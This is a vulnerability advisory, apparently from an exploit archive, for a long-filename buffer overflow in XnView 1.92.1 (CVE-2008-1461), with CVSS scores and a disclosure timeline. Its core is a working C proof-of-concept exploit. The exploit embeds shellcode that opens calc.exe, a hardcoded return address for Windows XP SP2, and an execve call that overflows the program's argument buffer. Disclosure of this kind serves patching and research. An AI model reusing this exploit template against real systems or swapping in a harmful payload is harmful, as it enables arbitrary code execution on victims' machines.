XNview 1.92.1 Long Filename Overflow

2008.03.24
Credit: Sylvain THUAL
Risk: High
Local: Yes
Remote: Yes
CVE: CVE-2008-1461
CWE: CWE-119


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-------- *XNview* -------- Informations : ************** Version : 1.92.1 Website : http://www.xnview.com/ Problem : Long Filename Overflow Description: ************ XnView is an efficient multimedia viewer, browser, and converter. It supports more than 400 graphic file formats (PNG, JPEG, TARGA, TIFF, GIF, BMP, and more). Details : ********* The problem is that XNview doesn't handle long file names.It result in an exploitable buffer overflow which allow execution of arbitrary code. POC: **** #include <windows.h> #include <unistd.h> /* Shellcode Size=164 octets Action: open calc.exe */ unsigned char shellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16" "\x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1" "\x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd" "\x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99" "\x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2" "\x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0" "\x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f" "\x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc" "\x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90" "\x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec" "\x73\x77\x0b\x94"; /* user32.dll ret adress ==> jmp ebp under Win XP pro SP2 */ unsigned char ret[] ="\x34\x59\x40\x7e"; int main(int argc,char *argv[]){ char *bufExe[3]; char buf[511]; bufExe[0] = "xnview.exe"; bufExe[2] = NULL; memset(buf,0x90,511); memcpy(&buf[260],ret,4); memcpy(&buf[330],shellcode,sizeof(shellcode)); bufExe[1] = buf; execve(bufExe[0],bufExe,NULL); return 0x0; } Disclosure Timeline: ******************** 04 February 2008 - Discovery 12 February 2008 - Vendor notification 13 February 2008 - Vendor reply 14 March 2008 - Release of XNview 1.93.1 15 March 2008 - Public Disclosure Credits: ******** Author : Sylvain THUAL Original advisory(French) : http://www.click-internet.fr/index.php?cki=News&news=9 E-mail : contact (at) click-internet (dot) fr [email concealed] Website : http://www.click-internet.fr


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top